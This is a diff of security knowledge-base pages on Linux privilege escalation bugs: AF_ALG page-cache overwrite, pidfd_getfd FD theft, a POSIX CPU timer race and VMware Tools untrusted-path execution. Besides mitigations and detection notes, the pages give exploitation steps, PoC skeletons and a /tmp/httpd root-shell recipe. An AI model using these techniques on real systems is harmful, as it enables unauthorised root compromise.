+++ b/src/linux-hardening/main-system-information/kernel-lpe-cves/copy-fail-af_alg-splice-page-cache-overwrite-cve-2026-31431.md
@@ -1,20 +1,18 @@
 # Copy Fail: AF_ALG + splice page-cache overwrite (CVE-2026-31431)
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 This page documents **Copy Fail**: a Linux kernel local privilege escalation where **`AF_ALG` + `splice()`** turns **readable file page-cache pages** into part of a **writable AEAD destination scatterlist**, and `authencesn` then performs a **deterministic 4-byte write past the contractual output boundary**.<sup>[[1]](#references)</sup>
 
-- Affected component: `crypto/algif_aead.c` in-place decrypt path + `crypto/authencesn.c`
-- Primitive: controlled **4-byte page-cache write** into any file readable by the attacker
-- Reachability: unprivileged local user, `AF_ALG` available, `algif_aead` loaded
-- Impact: immediate system-wide corruption of the page-cache copy used by `read()`, `mmap()`, and `execve()`
+- Affected component: `crypto/algif_aead.c` in-place decrypt path + `crypto/authencesn.c`.<sup>[[1]](#references)</sup>
+- Primitive: controlled **4-byte page-cache write** into any file readable by the attacker.<sup>[[1]](#references)</sup>
+- Reachability: unprivileged local user, `AF_ALG` available, `algif_aead` loaded.<sup>[[1]](#references)</sup>
+- Impact: immediate system-wide corruption of the page-cache copy used by `read()`, `mmap()`, and `execve()`.<sup>[[1]](#references)</sup>
 
-This is closer to **Dirty Pipe / Dirty COW style page-cache abuse** than to a classic memory-corruption race:
+This is closer to **Dirty Pipe / Dirty COW style page-cache abuse** than to a classic memory-corruption race:<sup>[[1]](#references)</sup>
 
-- no race window<sup>[[1]](#references)</sup>
-- no repeated retries<sup>[[1]](#references)</sup>
-- no on-disk file modification<sup>[[1]](#references)</sup>
-- same exploit flow across many distros because the primitive is structural, not offset-dependent
+- no race window.<sup>[[1]](#references)</sup>
+- no repeated retries.<sup>[[1]](#references)</sup>
+- no on-disk file modification.<sup>[[1]](#references)</sup>
+- same exploit flow across many distros because the primitive is structural, not offset-dependent.<sup>[[1]](#references)</sup>
 
 ## Core idea
 
@@ -45,7 +43,7 @@ When `algif_aead` has chained page-cache-backed tag pages into `dst`, that write
 
 ## Why this becomes a useful primitive
 
-The attacker controls:
+The attacker controls:<sup>[[1]](#references)</sup>
 
 - **Which file**: any file readable by the attacker
 - **Which offset**: via splice offset/length and AEAD `assoclen`
@@ -70,7 +68,7 @@ The public write-up targets a **setuid-root binary** such as `/usr/bin/su`:<sup>
 5. Repeat until the page-cache copy of the setuid binary is patched
 6. Execute the binary so the kernel loads the modified cached image and runs attacker code as root
 
-Conceptual PoC skeleton:
+Conceptual PoC skeleton:<sup>[[1]](#references)</sup>
 
 ```python
 a = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET
@@ -84,9 +82,9 @@ u.recv(...)  # triggers decrypt -> page-cache write
 
 ## How the bug became exploitable
 
-- **2011**: `authencesn` introduced for IPsec ESN handling (`a5079d084f8b`)<sup>[[6]](#references)</sup>
-- **2015**: `authencesn` converted to the new AEAD interface and kept the out-of-contract scratch write (`104880a6b470`)<sup>[[5]](#references)</sup>
-- **2017**: `algif_aead` switched decrypt to an in-place design and chained tag pages into the destination (`72548b093ee3`)<sup>[[4]](#references)</sup>
+- **2011**: `authencesn` introduced for IPsec ESN handling (`a5079d084f8b`).<sup>[[1]](#references)[[6]](#references)</sup>
+- **2015**: `authencesn` converted to the new AEAD interface and kept the out-of-contract scratch write (`104880a6b470`).<sup>[[1]](#references)[[5]](#references)</sup>
+- **2017**: `algif_aead` switched decrypt to an in-place design and chained tag pages into the destination (`72548b093ee3`).<sup>[[1]](#references)[[4]](#references)</sup>
 
 That 2017 change is what turned an internal scratch write into a **page-cache write primitive** reachable from unprivileged userspace.<sup>[[1]](#references)[[4]](#references)</sup>
 
@@ -100,7 +98,7 @@ Useful mitigations:<sup>[[2]](#references)</sup>
 - block `AF_ALG` socket creation with seccomp for untrusted workloads
 - disable `algif_aead` if you need an immediate stopgap
 
-Example emergency mitigation:
+Example emergency mitigation:<sup>[[2]](#references)</sup>
 
 ```bash
 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
@@ -111,10 +109,10 @@ For containerized environments, `AF_ALG` should be treated as a **kernel attack 
 
 ## Detection / review notes
 
-- A page-cache-only patch means the suspicious effect may be visible only in memory, not on disk.
-- Look for unusual `AF_ALG` use on systems that do not intentionally expose kernel crypto sockets to workloads.
-- When auditing zero-copy kernel interfaces, treat any path that combines **`splice()`-backed page references** with **scatterlists reused as destinations** as high risk.
-- A useful reviewer rule is: if an algorithm writes beyond its documented output length, any caller that chains foreign pages into `dst` may turn it into a write primitive.
+- A page-cache-only patch means the suspicious effect may be visible only in memory, not on disk.<sup>[[1]](#references)</sup>
+- Look for unusual `AF_ALG` use on systems that do not intentionally expose kernel crypto sockets to workloads.<sup>[[2]](#references)</sup>
+- When auditing zero-copy kernel interfaces, treat any path that combines **`splice()`-backed page references** with **scatterlists reused as destinations** as high risk.<sup>[[1]](#references)</sup>
+- A useful reviewer rule is: if an algorithm writes beyond its documented output length, any caller that chains foreign pages into `dst` may turn it into a write primitive.<sup>[[1]](#references)</sup>
 
 ## References
 

--- a/src/linux-hardening/main-system-information/kernel-lpe-cves/linux-ptrace-exit-race-pidfd_getfd-fd-theft.md
+++ b/src/linux-hardening/main-system-information/kernel-lpe-cves/linux-ptrace-exit-race-pidfd_getfd-fd-theft.md
@@ -1,14 +1,12 @@
 # Linux ptrace exit-race `pidfd_getfd()` FD theft
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 A useful **Linux kernel privesc pattern** is to turn a **ptrace authorization bug** into **file descriptor theft** from a privileged process.
 
 In the Qualys `__ptrace_may_access()` case study (CVE-2026-46333), the attacker races a **privileged process that is exiting or dropping credentials** and uses `pidfd_getfd()` to duplicate an FD into the attacker process.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Core idea
 
-`pidfd_getfd()` duplicates a file descriptor from another process, but first checks ptrace-style permissions against the target. If that authorization is incorrectly granted during a **teardown window**, an unprivileged attacker can copy:
+`pidfd_getfd()` duplicates a file descriptor from another process, but first checks ptrace-style permissions against the target.<sup>[[3]](#references)</sup> If that authorization is incorrectly granted during a **teardown window**, an unprivileged attacker can copy:
 
 - FDs for **sensitive files** already opened by a privileged helper
 - FDs for **authenticated IPC channels** already authorized as root
@@ -24,19 +22,19 @@ The attack does **not** need a bug in the privileged helper itself. The helper o
 - a privileged D-Bus / systemd connection
 - any other already-open secret or authorized channel
 
-Once duplicated into the attacker process, the kernel enforces operations on the **stolen FD**, not on the original pathname or on a fresh authentication flow.<sup>[[1]](#references)</sup>
+Once duplicated into the attacker process, the duplicate refers to the same open file description, so subsequent reads or IPC requests use the already-open FD rather than reopening the original pathname or starting a fresh authentication flow.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ## Exploitation pattern
 
-1. Identify a **setuid / setgid / file-capability binary** or **root daemon** that opens sensitive files or keeps useful IPC connections.
-2. Gain a relationship that satisfies the relevant ptrace policy checks for the target path (for example, being the **parent** of a spawned privileged child under permissive YAMA settings).
-3. Race the process while it is **exiting**, **dropping credentials**, or otherwise entering a state where ptrace access should have become unavailable.
-4. Use `pidfd_open()` + `pidfd_getfd()` to duplicate the target FD during the narrow authorization window.
-5. Reuse the stolen FD from the unprivileged context:
+1. Identify a **setuid / setgid / file-capability binary** or **root daemon** that opens sensitive files or keeps useful IPC connections.<sup>[[2]](#references)</sup>
+2. Gain a relationship that satisfies the relevant ptrace policy checks for the target path (for example, being the **parent** of a spawned privileged child under permissive YAMA settings).<sup>[[2]](#references)[[4]](#references)</sup>
+3. Race the process while it is **exiting**, **dropping credentials**, or otherwise entering a state where ptrace access should have become unavailable.<sup>[[2]](#references)</sup>
+4. Use `pidfd_open()` + `pidfd_getfd()` to duplicate the target FD during the narrow authorization window.<sup>[[2]](#references)[[3]](#references)[[5]](#references)</sup>
+5. Reuse the stolen FD from the unprivileged context.<sup>[[2]](#references)</sup>
    - `read()` secrets from a privileged file descriptor
-   - send requests over a stolen authenticated IPC channel to get **root-side actions**<sup>[[1]](#references)</sup>
+   - send requests over a stolen authenticated IPC channel to get **root-side actions**
 
-Minimal primitive shape:<sup>[[1]](#references)[[3]](#references)</sup>
+Minimal primitive shape.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
 ```c
 int p = pidfd_open(victim_pid, 0);
@@ -46,7 +44,7 @@ int stolen = pidfd_getfd(p, victim_fd, 0);
 
 ## Practical targets to audit
 
-Prioritize binaries and daemons that, even briefly, do one of these:<sup>[[1]](#references)</sup>
+Prioritize binaries and daemons that, even briefly, do one of these:<sup>[[1]](#references)[[2]](#references)</sup>
 
 - open root-only files before finishing privilege transitions
 - connect to the **system bus** and keep an already-authorized channel
@@ -62,26 +60,26 @@ Good hunting candidates:<sup>[[1]](#references)</sup>
 
 ## YAMA as an exploit gate
 
-`kernel.yama.ptrace_scope` is a major practical gate for ptrace-family abuse:<sup>[[4]](#references)</sup>
+`kernel.yama.ptrace_scope` is a major practical gate for ptrace-family abuse:<sup>[[3]](#references)[[4]](#references)</sup>
 
 - `0`: classical same-UID ptrace behavior
 - `1`: typically allows parent -> child tracing, which can keep some public exploit paths reachable
 - `2`: requires `CAP_SYS_PTRACE` for attach-style access and blocks unprivileged `pidfd_getfd()` abuse in this path
 - `3`: disables ptrace attach entirely until reboot
 
-For this technique, `ptrace_scope=2` is a strong **temporary mitigation** because it breaks the public `pidfd_getfd()` exploitation path with `-EPERM` for unprivileged users.<sup>[[1]](#references)</sup>
+For this technique, `ptrace_scope=2` is a strong **temporary mitigation** because it breaks the public `pidfd_getfd()` exploitation path with `-EPERM` for unprivileged users.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ## Detection / review ideas
 
 When auditing privileged Linux software, look for these combinations:
 
-- **privileged child process** + **attacker-controlled parent**
+- **privileged child process** + **attacker-controlled parent**.<sup>[[2]](#references)[[4]](#references)</sup>
 - temporary access to **valuable open files**
-- temporary access to **authenticated D-Bus/systemd channels**
+- temporary access to **authenticated D-Bus/systemd channels**.<sup>[[2]](#references)</sup>
 - security decisions that reuse **ptrace-style authorization** outside classic `ptrace(2)`
 - kernel APIs that can **duplicate, inherit, or re-export** existing privileged FDs
 
-When auditing the kernel, treat any path that does **ptrace-equivalent authorization** during **task teardown** as high risk, especially if success yields direct access to `task->files` or other already-authorized process resources.
+When auditing the kernel, treat any path that does **ptrace-equivalent authorization** during **task teardown** as high risk, especially if success yields direct access to `task->files` or other already-authorized process resources.<sup>[[2]](#references)</sup>
 
 ## References
 
@@ -89,5 +87,6 @@ When auditing the kernel, treat any path that does **ptrace-equivalent authoriza
 - [2] [Qualys advisory TXT](https://cdn2.qualys.com/advisory/2026/05/20/cve-2026-46333-ptrace.txt)
 - [3] [pidfd_getfd(2) manual page](https://man7.org/linux/man-pages/man2/pidfd_getfd.2.html)
 - [4] [Linux kernel Yama documentation](https://www.kernel.org/doc/html/latest/admin-guide/LSM/Yama.html)
+- [5] [pidfd_open(2) manual page](https://man7.org/linux/man-pages/man2/pidfd_open.2.html)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/main-system-information/kernel-lpe-cves/posix-cpu-timers-toctou-cve-2025-38352.md
+++ b/src/linux-hardening/main-system-information/kernel-lpe-cves/posix-cpu-timers-toctou-cve-2025-38352.md
@@ -1,15 +1,13 @@
 # POSIX CPU Timers TOCTOU race (CVE-2025-38352)
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.<sup>[[1]](#references)[[2]](#references)</sup>
 
-- Affected component: kernel/time/posix-cpu-timers.c
-- Primitive: expiry vs deletion race under task exit
-- Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)
+- Affected component: kernel/time/posix-cpu-timers.c.<sup>[[1]](#references)</sup>
+- Primitive: expiry vs deletion race under task exit.<sup>[[1]](#references)</sup>
+- Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path).<sup>[[1]](#references)</sup>
 
-Quick internals recap (relevant for exploitation)
-- Three CPU clocks drive accounting for timers via cpu_clock_sample():
+Quick internals recap (relevant for exploitation):<sup>[[1]](#references)</sup>
+- Three CPU clocks drive accounting for timers via cpu_clock_sample():<sup>[[1]](#references)</sup>
   - CPUCLOCK_PROF: utime + stime
   - CPUCLOCK_VIRT: utime only
   - CPUCLOCK_SCHED: task_sched_runtime()
@@ -76,7 +74,7 @@ static u64 collect_timerqueue(struct timerqueue_head *head,
 }
 ```
 
-Two expiry-processing modes<sup>[[1]](#references)</sup>
+Two expiry-processing modes:<sup>[[1]](#references)</sup>
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
 
@@ -105,7 +103,7 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
 
 </details>
 
-In the IRQ-context path, the firing list is processed outside sighand<sup>[[1]](#references)</sup>
+In the IRQ-context path, the firing list is processed outside sighand.<sup>[[1]](#references)</sup>
 
 <details>
 <summary>IRQ-context delivery loop</summary>
@@ -136,13 +134,13 @@ static void handle_posix_cpu_timers(struct task_struct *tsk) {
 
 </details>
 
-Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
-Preconditions
+Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit.<sup>[[1]](#references)</sup>
+Preconditions:<sup>[[1]](#references)</sup>
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
 - The target task is exiting but not fully reaped
 - Another thread concurrently calls posix_cpu_timer_del() for the same timer
 
-Sequence
+Sequence:<sup>[[1]](#references)</sup>
 1) update_process_times() triggers run_posix_cpu_timers() in IRQ context for the exiting task.
 2) collect_timerqueue() sets ctmr->firing = 1 and moves the timer to the temporary firing list.
 3) handle_posix_cpu_timers() drops sighand via unlock_task_sighand() to deliver timers outside the lock.
@@ -195,12 +193,12 @@ The easiest way to keep a zombie around without it being auto-reaped is to ptrac
 
 This choreography guarantees a window where handle_posix_cpu_timers() can still reference `tsk->sighand`, while a subsequent waitpid() tears it down and allows timer_delete() to reclaim the same k_itimer object.<sup>[[4]](#references)</sup>
 
-Why TASK_WORK mode is safe by design
+Why TASK_WORK mode is safe by design:<sup>[[1]](#references)[[3]](#references)</sup>
 - With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.<sup>[[1]](#references)</sup>
-- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
+- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.<sup>[[3]](#references)</sup>
 
-Fix (Android common kernel) and rationale
-- Add an early return if current task is exiting, gating all processing:<sup>[[1]](#references)[[3]](#references)[[6]](#references)</sup>
+Fix (Android common and Linux stable kernels) and rationale:<sup>[[1]](#references)[[3]](#references)[[6]](#references)</sup>
+- Add an early return if the current task is exiting, gating all processing; the stable-tree commit applies the equivalent check before running POSIX CPU timers.<sup>[[1]](#references)[[3]](#references)[[6]](#references)</sup>
 
 ```c
 // kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
@@ -210,11 +208,11 @@ if (tsk->exit_state)
 
 - This prevents entering handle_posix_cpu_timers() for exiting tasks, eliminating the window where posix_cpu_timer_del() could miss it.cpu.firing and race with expiry processing.<sup>[[1]](#references)[[3]](#references)[[6]](#references)</sup>
 
-Impact
-- Kernel memory corruption of timer structures during concurrent expiry/deletion can yield immediate crashes (DoS) and is a strong primitive toward privilege escalation due to arbitrary kernel-state manipulation opportunities.
+Impact:<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
+- Kernel memory corruption of timer structures during concurrent expiry/deletion can yield immediate crashes (DoS) and is a strong primitive toward privilege escalation due to arbitrary kernel-state manipulation opportunities.<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
 
-Triggering the bug (safe, reproducible conditions)
-Build/config
+Triggering the bug (safe, reproducible conditions):<sup>[[4]](#references)</sup>
+Build/config:<sup>[[4]](#references)</sup>
 - Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:<sup>[[4]](#references)</sup>
 
 ```c
@@ -228,8 +226,8 @@ This mirrors what Android vendors did for analysis builds; upstream x86_64 and a
 
 - Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.<sup>[[4]](#references)</sup>
 
-Runtime strategy
-- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
+Runtime strategy:<sup>[[4]](#references)</sup>
+- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):<sup>[[4]](#references)</sup>
   - For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...)
   - For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...)
 - Arm with a very short initial expiration and small interval to maximize IRQ-path entries:<sup>[[4]](#references)</sup>
@@ -298,7 +296,7 @@ static void *worker(void *arg) {
 </details>
 
 #### Race timeline
-1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
+1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.<sup>[[4]](#references)</sup>
 2. Parent `PTRACE_ATTACH`es, waits in `waitpid(__WALL)`, then `PTRACE_CONT` to let the worker run and exit.
 3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent executes `waitpid(tid, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
 4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
@@ -310,13 +308,13 @@ For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cp
 ### Later public PoC reliability tricks
 Later public PoCs showed the race can also be won on unmodified 6.12.33-era kernels without inserting a debug `mdelay()`, mainly by increasing how much kernel work happens **after** `unlock_task_sighand()` and by making retries deterministic.<sup>[[7]](#references)</sup>
 
-- **Assign different jobs to different timers:** use one timer as the actual UAF target and a batch of extra "stall timers" that only exist to keep `handle_posix_cpu_timers()` busy. Public PoCs tagged the interesting timers with `SIGEV_SIGNAL | SIGEV_THREAD_ID`, different signals, and a recognizable `sigev_value`, so userland can distinguish "the firing list ran" from "the freed timer survived long enough to deliver".<sup>[[7]](#references)[[8]](#references)</sup>
+- **Assign different jobs to different timers:** use one timer as the actual UAF target and a batch of extra "stall timers" that only exist to keep `handle_posix_cpu_timers()` busy. Public PoCs used `SIGEV_SIGNAL`/`SIGUSR1` stall timers and a distinct `SIGUSR2` signal to detect a successful timer reallocation; researchers also used unique `sigev_value` markers while instrumenting allocations.<sup>[[7]](#references)[[8]](#references)</sup>
 - **Calibrate on CPU time, not wall time:** measure the per-syscall cost of `clock_gettime(CLOCK_THREAD_CPUTIME_ID, ...)` / `getpid()` and burn just enough victim CPU before `return` so `do_exit()` lands immediately before expiry. This is more stable than `nanosleep()` because the timer only advances while the victim thread actually consumes CPU.<sup>[[7]](#references)</sup>
 - **Stretch `complete_signal()` from userland:** queue several extra timers and create a very large thread group with `SIGUSR1` blocked in every helper thread, then drain those signals through a shared `signalfd`. When `cpu_timer_fire()` reaches `posix_timer_queue_signal()` → `send_sigqueue()` → `complete_signal()`, the kernel has to inspect far more candidate threads, stretching the post-`unlock_task_sighand()` window. Public follow-up research reported profiled handling windows around **31-34 ms** and a final exploit window around **24-26 ms** after tuning.<sup>[[7]](#references)[[8]](#references)</sup>
 - **Synchronize RCU-backed retries:** after `timer_delete()`, wait for an RCU grace period before attempting immediate reuse or the next retry. Public PoCs used a tiny `wait_for_rcu()` helper around `membarrier(MEMBARRIER_CMD_GLOBAL, 0)` so the freed `struct k_itimer` is no longer only pending `call_rcu()` when the next attempt starts.<sup>[[7]](#references)</sup>
 
 ### Instrumentation cues during exploitation
-- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.
+- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.<sup>[[1]](#references)</sup>
 - KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.<sup>[[4]](#references)</sup>
 - Quick checks that match the public PoCs:<sup>[[4]](#references)</sup>
 
@@ -326,15 +324,15 @@ zgrep CONFIG_POSIX_CPU_TIMERS_TASK_WORK /proc/config.gz 2>/dev/null || grep CONF
 dmesg -w | egrep 'slab-use-after-free in posix_timer_queue_signal|send_sigqueue|handle_posix_cpu_timers: delta_ns='
 ```
 
-Audit hotspots (for reviewers)
+Audit hotspots (for reviewers):<sup>[[1]](#references)</sup>
 - update_process_times() → run_posix_cpu_timers() (IRQ)
 - __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
 - collect_timerqueue(): sets ctmr->firing and moves nodes
 - handle_posix_cpu_timers(): drops sighand before firing loop
-- posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap<sup>[[1]](#references)</sup>
+- posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap.<sup>[[1]](#references)</sup>
 
-Notes for exploitation research
-- The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.
+Notes for exploitation research:<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
+- The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
 
 ## References
 - [1] [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)

--- a/src/linux-hardening/main-system-information/kernel-lpe-cves/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
+++ b/src/linux-hardening/main-system-information/kernel-lpe-cves/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
@@ -1,23 +1,21 @@
 # VMware Tools service discovery LPE (CWE-426) via regex-based binary discovery (CVE-2025-41244)
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 This technique abuses regex-driven service discovery pipelines that parse running process command lines to infer service versions and then execute a candidate binary with a "version" flag. When permissive patterns accept untrusted, attacker-controlled paths (e.g., /tmp/httpd), the privileged collector executes an arbitrary binary from an untrusted location, yielding local privilege escalation. NVISO documented this in VMware Tools/Aria Operations Service Discovery as CVE-2025-41244.<sup>[[1]](#references)[[2]](#references)</sup>
 
-- Impact: Local privilege escalation to root (or to the privileged discovery account)
-- Root cause: Untrusted Search Path (CWE-426) + permissive regex matching of process command lines<sup>[[5]](#references)</sup>
-- Affected: open-vm-tools/VMware Tools on Linux (credential-less discovery), VMware Aria Operations SDMP (credential-based discovery via Tools/proxy)
+- Impact: Local privilege escalation to root (or to the privileged discovery account).<sup>[[1]](#references)[[2]](#references)</sup>
+- Root cause: Untrusted Search Path (CWE-426) + permissive regex matching of process command lines.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
+- Affected: open-vm-tools/VMware Tools on Linux (credential-less discovery), VMware Aria Operations SDMP (credential-based discovery via Tools/proxy).<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## How VMware service discovery works (high level)
 
-- Credential-based (legacy): Aria executes discovery scripts inside the guest via VMware Tools using configured privileged credentials.
-- Credential-less (modern): Discovery logic runs within VMware Tools, already privileged in the guest.
+- Credential-based (legacy): Aria executes discovery scripts inside the guest via VMware Tools using configured privileged credentials.<sup>[[1]](#references)</sup>
+- Credential-less (modern): Discovery logic runs within VMware Tools, already privileged in the guest.<sup>[[1]](#references)</sup>
 
-Both modes ultimately run shell logic that scans processes with listening sockets, extracts a matching command path via a regex, and executes the first argv token with a version flag.<sup>[[1]](#references)</sup>
+Both modes ultimately run shell logic that scans processes with listening sockets, extracts a matching command path via a regex, and executes the first argv token with a version flag.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ## Root cause and vulnerable pattern (open-vm-tools)
 
-In open-vm-tools, the serviceDiscovery plugin script get-versions.sh matches candidate binaries using broad regular expressions and executes the first token without any trusted-path validation:<sup>[[1]](#references)[[3]](#references)</sup>
+In open-vm-tools, the serviceDiscovery plugin script get-versions.sh matches candidate binaries using broad regular expressions and executes the first token without any trusted-path validation.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 get_version() {
@@ -31,7 +29,7 @@ get_version() {
 }
 ```
 
-It is invoked with permissive patterns containing \S (non-whitespace) that will happily match non-system paths in user-writable locations:
+It is invoked with permissive patterns containing \S (non-whitespace) that will happily match non-system paths in user-writable locations.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
@@ -42,23 +40,23 @@ get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
 get_version "/\S+/dataserver($|\s)" -v
 ```
 
-- Extraction uses grep -Eo and takes the first token: ${COMMAND%%[[:space:]]*}
-- No whitelist/allowlist of trusted system paths; any discovered listener with a matching name is executed with -v/--version
+- Extraction uses grep -Eo and takes the first token: ${COMMAND%%[[:space:]]*}.<sup>[[1]](#references)[[3]](#references)</sup>
+- No whitelist/allowlist of trusted system paths; any discovered listener with a matching name is executed with -v/--version.<sup>[[1]](#references)[[3]](#references)</sup>
 
 This creates an untrusted search path execution primitive: arbitrary binaries located in world-writable directories (e.g., /tmp/httpd) get executed by a privileged component.<sup>[[1]](#references)</sup>
 
 ## Exploitation (both credential-less and credential-based modes)
 
 Preconditions
-- You can run an unprivileged process that opens a listening socket on the guest.
-- The discovery job is enabled and runs periodically (historically ~5 minutes).
+- You can run an unprivileged process that opens a listening socket on the guest.<sup>[[1]](#references)</sup>
+- The discovery job is enabled and runs periodically (historically ~5 minutes).<sup>[[1]](#references)</sup>
 
 Steps
-1) Stage a binary in a path matching one of the permissive regexes, e.g. /tmp/httpd or ./nginx
-2) Run it as a low-privileged user and ensure it opens any listening socket
-3) Wait for the discovery cycle; the privileged collector will automatically execute: /tmp/httpd -v (or similar), running your program as root<sup>[[1]](#references)</sup>
+1) Stage a binary in a path matching one of the permissive regexes, e.g. /tmp/httpd or ./nginx.<sup>[[1]](#references)</sup>
+2) Run it as a low-privileged user and ensure it opens any listening socket.<sup>[[1]](#references)</sup>
+3) Wait for the discovery cycle; the privileged collector will automatically execute: /tmp/httpd -v (or similar), running your program as root.<sup>[[1]](#references)</sup>
 
-Minimal demo (using NVISO’s approach)<sup>[[1]](#references)</sup>
+Minimal demo (using NVISO’s approach).<sup>[[1]](#references)</sup>
 ```bash
 # Build any small helper that:
 #  - default mode: opens a dummy TCP listener
@@ -70,12 +68,12 @@ chmod +x /tmp/httpd
 # After the next cycle, expect a root shell or your privileged action
 ```
 
-Typical process lineage<sup>[[1]](#references)</sup>
+Typical process lineage.<sup>[[1]](#references)</sup>
 - Credential-based: /usr/bin/vmtoolsd -> /bin/sh /tmp/VMware-SDMP-Scripts-.../script_...sh -> /tmp/httpd -v -> /bin/sh -i
 - Credential-less: /bin/sh .../get-versions.sh -> /tmp/httpd -v -> /bin/sh -i
 
 Artifacts (credential-based)
-Recovered SDMP wrapper scripts under /tmp/VMware-SDMP-Scripts-{UUID}/ may show direct execution of the rogue path:<sup>[[1]](#references)</sup>
+Recovered SDMP wrapper scripts under /tmp/VMware-SDMP-Scripts-{UUID}/ may show direct execution of the rogue path.<sup>[[1]](#references)</sup>
 ```bash
 /tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"
 ```
@@ -89,7 +87,7 @@ Many agents and monitoring suites implement version/service discovery by:
 
 If the regex accepts untrusted paths and the path is executed from a privileged context, you get CWE-426 Untrusted Search Path execution.<sup>[[5]](#references)</sup>
 
-Abuse recipe
+Abuse recipe for these patterns.<sup>[[1]](#references)</sup>
 - Name your binary like common daemons that the regex is likely to match: httpd, nginx, mysqld, dataserver
 - Place it in a writable directory: /tmp/httpd, ./nginx
 - Ensure it matches the regex and opens any port to be enumerated
@@ -103,12 +101,12 @@ Reusable privileged I/O relay trick
 ## Detection and DFIR guidance
 
 Hunting queries
-- Uncommon children of vmtoolsd or get-versions.sh such as /tmp/httpd, ./nginx, /tmp/mysqld<sup>[[1]](#references)</sup>
-- Any execution of non-system absolute paths by discovery scripts (look for spaces in ${COMMAND%%...} expansions)
-- ps -ef --forest to visualize ancestry trees: vmtoolsd -> get-versions.sh -> <non-system path><sup>[[1]](#references)</sup>
+- Uncommon children of vmtoolsd or get-versions.sh such as /tmp/httpd, ./nginx, /tmp/mysqld.<sup>[[1]](#references)</sup>
